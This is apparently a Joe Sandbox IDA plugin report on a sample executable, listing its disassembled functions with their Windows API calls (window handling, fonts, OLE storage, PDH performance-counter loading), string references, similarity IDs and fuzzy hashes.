Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: e5c96335c7528439dd7b04d42a9c84ba000a2a0b20ae7e40e7d1654a628c3bbb
Instruction ID: 903901d973df4581c4d75fc1c9c23bad2e1c64f53c7f1b85533160815c384b75
Opcode Fuzzy Hash: e5c96335c7528439dd7b04d42a9c84ba000a2a0b20ae7e40e7d1654a628c3bbb
Instruction Fuzzy Hash: 6331E731A40714BBEB205F61CC46FABBB65EF48714F108136F919BA1E2C7B8A800DB58

Function 0042D0A7 Relevance: 13.6, APIs: 9, Instructions: 80windowstringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0042D0B1
GetFocus.USER32 ref: 0042D0CC

Part of subcall function 00430D3B: UnhookWindowsHookEx.USER32(?), ref: 00430D60

IsWindowEnabled.USER32(?), ref: 0042D0F5
EnableWindow.USER32(?,00000000), ref: 0042D107
GetOpenFileNameA.COMDLG32(?), ref: 0042D132
GetSaveFileNameA.COMDLG32(?), ref: 0042D139
EnableWindow.USER32(?,00000001), ref: 0042D150
IsWindow.USER32(00000000), ref: 0042D156
SetFocus.USER32(00000000), ref: 0042D164

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: f61b0b5c181d266f53bd1e9308bfe51a5bddcb62dc7a355c3b11c300c05244e8
Instruction ID: f4be2ea9b6dc3aefb1c0455f0d776396a3738473a2c699c230cf95a83680288a
Opcode Fuzzy Hash: f61b0b5c181d266f53bd1e9308bfe51a5bddcb62dc7a355c3b11c300c05244e8
Instruction Fuzzy Hash: F721E031700B10ABE720AF32EC5AB2B77E8EF40306F40442FF58686692DB78E810C759

Function 004292C0 Relevance: 13.6, APIs: 9, Instructions: 54COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0046F280,?,0042871F), ref: 004292C6
GlobalDeleteAtom.KERNEL32(00000000), ref: 00429302
GlobalDeleteAtom.KERNEL32(00000000), ref: 0042931D
GlobalDeleteAtom.KERNEL32(00000000), ref: 00429330
GlobalDeleteAtom.KERNEL32(00000000), ref: 00429343
GlobalDeleteAtom.KERNEL32(00000000), ref: 00429356
GlobalDeleteAtom.KERNEL32(00000000), ref: 00429369
GlobalDeleteAtom.KERNEL32(00000000), ref: 0042937C
LeaveCriticalSection.KERNEL32(0046F280,?,0042871F), ref: 0042938D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
String ID:
API String ID: 3843206905-0
Opcode ID: de33e392dd62d34e5bb363c079e254258e4b14677046cbaf4109e8211d760500
Instruction ID: d989bfedb9c1cb9d2f5860f5f502434281630627dd5e88f3a79110f7d5782ef6
Opcode Fuzzy Hash: de33e392dd62d34e5bb363c079e254258e4b14677046cbaf4109e8211d760500
Instruction Fuzzy Hash: 00110D6D90462599D716ABA4FC2C6AA3668A70C704F4440B6E890476F0F7FD4CC9CFAE

Function 004087B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00408863
GetSystemMetrics.USER32(00000047), ref: 0040887B
SystemParametersInfoA.USER32 ref: 00408964
CreateFontIndirectA.GDI32(?), ref: 00408991
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 004089E7
GetSystemMetrics.USER32(0000000F), ref: 00408A39

Part of subcall function 00438B78: __EH_prolog.LIBCMT ref: 00438B7D
Part of subcall function 00438B78: GetDC.USER32(00000001), ref: 00438BA6

Part of subcall function 00448603: lstrcpynA.KERNEL32(?,?,00000020), ref: 0044862F

Part of subcall function 00438472: SelectObject.GDI32(?,00000000), ref: 00438494
Part of subcall function 00438472: SelectObject.GDI32(?,?), ref: 004384AA

Strings

Arial, xrefs: 00408817

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: System$ExtentMetricsObjectPoint32SelectText$CreateFontH_prologIndirectInfoParameterslstrcpyn
String ID: Arial
API String ID: 1760193233-493054409
Opcode ID: 4f6a189a9c82405656f730ee513269a4a9dcabf37895a67fef4071311cb71f7f
Instruction ID: 08c032750fb9edfbfe2f59e0d4fa19dd844b86c10cb3fefd4aa6506a475e6994
Opcode Fuzzy Hash: 4f6a189a9c82405656f730ee513269a4a9dcabf37895a67fef4071311cb71f7f
Instruction Fuzzy Hash: BCA18DB15083428FD714DF24C945BABBBE4FB98304F04892EF89997391DB78D909CB96

Function 00408B40 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00408BF3
GetSystemMetrics.USER32(00000047), ref: 00408C0B
SystemParametersInfoA.USER32 ref: 00408CF4
CreateFontIndirectA.GDI32(?), ref: 00408D21
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00408D77
GetSystemMetrics.USER32(0000000F), ref: 00408DC9

Part of subcall function 00438B78: __EH_prolog.LIBCMT ref: 00438B7D
Part of subcall function 00438B78: GetDC.USER32(00000001), ref: 00438BA6

Part of subcall function 00448603: lstrcpynA.KERNEL32(?,?,00000020), ref: 0044862F

Part of subcall function 00438472: SelectObject.GDI32(?,00000000), ref: 00438494
Part of subcall function 00438472: SelectObject.GDI32(?,?), ref: 004384AA

Strings

Arial, xrefs: 00408BA7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: System$ExtentMetricsObjectPoint32SelectText$CreateFontH_prologIndirectInfoParameterslstrcpyn
String ID: Arial
API String ID: 1760193233-493054409
Opcode ID: fd9dcb893756947cdbfcc7a71f96289a045cb73aab3a19c6069b5df3215b0842
Instruction ID: 4d99eb0477b2268d2d46433b2c51e677b3b92d004e362cf0bcaf19556a3ba350
Opcode Fuzzy Hash: fd9dcb893756947cdbfcc7a71f96289a045cb73aab3a19c6069b5df3215b0842
Instruction Fuzzy Hash: EEA17BB15083429FD714CF24C945BABBBE4BF98304F04892EF89997391DB78D909CB96

Function 0043B33A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 209windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043B352
EqualRect.USER32(?,?), ref: 0043B36F

Part of subcall function 004338C4: SetWindowPos.USER32(?,?,?,?,00000013,00000000,00000000,?,0043C420,0046D0F8,00000000,00000000,00000000,00000000,00000013), ref: 004338EB

IsWindowVisible.USER32(?), ref: 0043B3F8
CopyRect.USER32(?,?), ref: 0043B42A
GetParent.USER32(?), ref: 0043B4DC
SetParent.USER32(?,?), ref: 0043B4FB

Strings

@, xrefs: 0043B38C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: @
API String ID: 3103310903-2766056989
Opcode ID: 27c4bc50db448baddf6d5b482ff638d78896f4cdec3ff7f0b5e9dd604a32e6e5
Instruction ID: 3f96f79b7796b4897465b2087690b13284b0b233ccbc9dcb74dfde59f13ada28
Opcode Fuzzy Hash: 27c4bc50db448baddf6d5b482ff638d78896f4cdec3ff7f0b5e9dd604a32e6e5
Instruction Fuzzy Hash: CC61BF71A00605EFDF15DF69CC81ABEBBB9EF48304F10552AFA1296292C738D941CB98

Function 0043B565 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043B57D
EqualRect.USER32(?,00000000), ref: 0043B599
GetDlgCtrlID.USER32(?), ref: 0043B61A
CopyRect.USER32(?,00000000), ref: 0043B647
GetParent.USER32(?), ref: 0043B6F8
SetParent.USER32(?,?), ref: 0043B717

Strings

@, xrefs: 0043B5B3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Parent$CopyCtrlEqualWindow
String ID: @
API String ID: 3581194824-2766056989
Opcode ID: d7c044a73a124dab36a72380a9c66f652fc0445c3b46c69299e410a2ee436f10
Instruction ID: 45b9c4544b77bd4373937862837a62496250ee1a199179b147061f50e02b6c21
Opcode Fuzzy Hash: d7c044a73a124dab36a72380a9c66f652fc0445c3b46c69299e410a2ee436f10
Instruction Fuzzy Hash: D151A071600605EFDF15DF69CC86BAE77B9EB48308F00552AFA11DB2A2DB38E901CB54

Function 00420C11 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00420C7E
GetStdHandle.KERNEL32(000000F4,0045C4F0,00000000,?,00000000,?), ref: 00420D54
WriteFile.KERNEL32(00000000), ref: 00420D5B

Strings

..., xrefs: 00420CD0
<program name unknown>, xrefs: 00420C8E
Microsoft Visual C++ Runtime Library, xrefs: 00420D2A
Runtime Error!Program: , xrefs: 00420CE4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: f392413f38ea8111e75dccbd02f34277112199d1036a071c7dac3ccb0d8a60a5
Instruction ID: b0e55d5b3268956652aeada519a5edc48cc4f364155097f2acadc4bcdcaa3701
Opcode Fuzzy Hash: f392413f38ea8111e75dccbd02f34277112199d1036a071c7dac3ccb0d8a60a5
Instruction Fuzzy Hash: C531E9B1B002286FDF20E7A1DC85F9A73ACDB45344F90056BF445D6051E678AA44CF1A

Function 0040ED20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040ED35
GetLastError.KERNEL32 ref: 0040ED44
GetProcAddress.KERNEL32(00000000,PdhEnumObjectItemsA), ref: 0040ED5A
GetLastError.KERNEL32 ref: 0040ED69

Strings

PDH.DLL, xrefs: 0040ED30
PdhEnumObjectItemsA, xrefs: 0040ED54
@, xrefs: 0040ED62, 0040ED71

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: @$PDH.DLL$PdhEnumObjectItemsA
API String ID: 1866314245-3113017544
Opcode ID: 62371a126b40d5f21eb54f090f4fe518754c09f142e427464b439088e9535ed6
Instruction ID: e8edd8b5b8a1c4590f6c5ab68d3ceb2152f8acc964502e4536425fad8a9c9136
Opcode Fuzzy Hash: 62371a126b40d5f21eb54f090f4fe518754c09f142e427464b439088e9535ed6
Instruction Fuzzy Hash: 28011BB2614200ABD204DBA6DC40D1B77E9EFCCB48B008A6DF549E3250E674ED51CB6A

Function 00414E49 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414E4E

Part of subcall function 00414C1B: CoGetClassObject.OLE32(00000000,?,00000000,0045C7C0,00000003,?,?,?,?,00414E77,?,00000000,00000003,0045C980,?,?), ref: 00414C3B

Part of subcall function 004398A9: __EH_prolog.LIBCMT ref: 004398AE

Part of subcall function 00439985: __EH_prolog.LIBCMT ref: 0043998A

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00414FD4
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00414FF5
GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041503D
GlobalLock.KERNEL32(00000000), ref: 0041504B
GlobalUnlock.KERNEL32(?), ref: 00415063
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00415086
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 004150A2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
String ID:
API String ID: 645133905-0
Opcode ID: 22c5c27862088234c3d87aa8cad5d40bd8836ae60ef3efd1e21799593777c106
Instruction ID: a866e56ed26a02024bae99fbd17b44678e0e349b00a90b0e63828d4a84f91dee
Opcode Fuzzy Hash: 22c5c27862088234c3d87aa8cad5d40bd8836ae60ef3efd1e21799593777c106
Instruction Fuzzy Hash: 82B1F7B0A0020AEFCB10DF94C884AEA7BB9FF88305B20446EF915DB251D775DD95CBA5

Function 0040EA60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EA75
GetLastError.KERNEL32 ref: 0040EA84
GetProcAddress.KERNEL32(00000000,PdhCalculateCounterFromRawValue), ref: 0040EA9A
GetLastError.KERNEL32 ref: 0040EAA9

Strings

PDH.DLL, xrefs: 0040EA70
PdhCalculateCounterFromRawValue, xrefs: 0040EA94
`@, xrefs: 0040EAA2, 0040EAB1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhCalculateCounterFromRawValue$`@
API String ID: 1866314245-293004412
Opcode ID: 396a0fccf0952d65499fbdac277bff6253e6db40b185f16c74c588023c638e13
Instruction ID: 70dddd5a191020830da210907346123a1d219e9bea776319c7929c096ab4559d
Opcode Fuzzy Hash: 396a0fccf0952d65499fbdac277bff6253e6db40b185f16c74c588023c638e13
Instruction Fuzzy Hash: E9F01DB1A043056BC600EFA6EC4491B3BE8AB88744740893EF509E3261E774D855CFAB

Function 0040EF20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EF35
GetLastError.KERNEL32 ref: 0040EF44
GetProcAddress.KERNEL32(00000000,PdhGetDefaultPerfCounterA), ref: 0040EF5A
GetLastError.KERNEL32 ref: 0040EF69

Strings

@, xrefs: 0040EF62, 0040EF71
PDH.DLL, xrefs: 0040EF30
PdhGetDefaultPerfCounterA, xrefs: 0040EF54

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: @$PDH.DLL$PdhGetDefaultPerfCounterA
API String ID: 1866314245-4169672429
Opcode ID: 8f26884661d9e0ac9197bd572cae9291c9d925b7af30c561618814739e0d31aa
Instruction ID: 435856dc82537251bd8be402d883d20b42bab6c2dff0ebb644565e700504bc62
Opcode Fuzzy Hash: 8f26884661d9e0ac9197bd572cae9291c9d925b7af30c561618814739e0d31aa
Instruction Fuzzy Hash: 08F01DB16042016BD604EF66EC44D173BE8EB84744B00893EF90AE3251E774E855CBAF

Function 0040E975 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040E985
GetLastError.KERNEL32 ref: 0040E994
GetProcAddress.KERNEL32(?,PdhAddCounterA), ref: 0040E9AA
GetLastError.KERNEL32(?,PdhAddCounterA), ref: 0040E9B9

Strings

PDH.DLL, xrefs: 0040E980
PdhAddCounterA, xrefs: 0040E9A4
p@, xrefs: 0040E9B2, 0040E9C1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhAddCounterA$p@
API String ID: 1866314245-2790000205
Opcode ID: 62e291b46b6a2f5047edf611ff76c2546b07a10b1ef00206edc1bc99a5dfb0e5
Instruction ID: dd79a356f6a238b6d882c1bd2c525d73f909726ef99fb5a1d66078bf2770f25f
Opcode Fuzzy Hash: 62e291b46b6a2f5047edf611ff76c2546b07a10b1ef00206edc1bc99a5dfb0e5
Instruction Fuzzy Hash: 4EF04FB16103016BD740EF66EC45A2737E8AF847487448C3EF809D3251F7B8D8148BAB

Function 0040EE30 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EE45
GetLastError.KERNEL32 ref: 0040EE54
GetProcAddress.KERNEL32(00000000,PdhExpandCounterPathA), ref: 0040EE6A
GetLastError.KERNEL32 ref: 0040EE79

Strings

PDH.DLL, xrefs: 0040EE40
0@, xrefs: 0040EE72, 0040EE81
PdhExpandCounterPathA, xrefs: 0040EE64

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: 0@$PDH.DLL$PdhExpandCounterPathA
API String ID: 1866314245-1248361307
Opcode ID: b671967418615db32a2ada6fa5d23a9abc298705f50f8b774a9a6246ca2c8220
Instruction ID: 8043c9a5f3926b059d426a88092c65c71263085d38348155841ed83d5dd1cd13
Opcode Fuzzy Hash: b671967418615db32a2ada6fa5d23a9abc298705f50f8b774a9a6246ca2c8220
Instruction Fuzzy Hash: DCF0FFB1A10304ABD614EB76EC449273BA8AB44798744893AF809D3251E774D811CF9A

Function 0040EC40 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EC55
GetLastError.KERNEL32 ref: 0040EC64
GetProcAddress.KERNEL32(00000000,PdhConnectMachineA), ref: 0040EC7A
GetLastError.KERNEL32 ref: 0040EC89

Strings

PDH.DLL, xrefs: 0040EC50
PdhConnectMachineA, xrefs: 0040EC74
@@, xrefs: 0040EC82, 0040EC91

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: @@$PDH.DLL$PdhConnectMachineA
API String ID: 1866314245-797567890
Opcode ID: d2865cc8d2bf10caa582dd73aada053fb7c12193b215fc3dc9d1a74a42df57ed
Instruction ID: baa24af777d0c4203b3580980ae04e68b3a305f9495b4497a39fe772a40b9486
Opcode Fuzzy Hash: d2865cc8d2bf10caa582dd73aada053fb7c12193b215fc3dc9d1a74a42df57ed
Instruction Fuzzy Hash: 1BF0F4B1A042106BD610EF76AC0595B3BACAB50789340893AF809E3261FBB5D4618B9F

Function 0040EAE5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EAF5
GetLastError.KERNEL32 ref: 0040EB04
GetProcAddress.KERNEL32(?,PdhCloseQuery), ref: 0040EB1A
GetLastError.KERNEL32(?,PdhCloseQuery), ref: 0040EB29

Strings

PDH.DLL, xrefs: 0040EAF0
@, xrefs: 0040EB22, 0040EB31
PdhCloseQuery, xrefs: 0040EB14

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

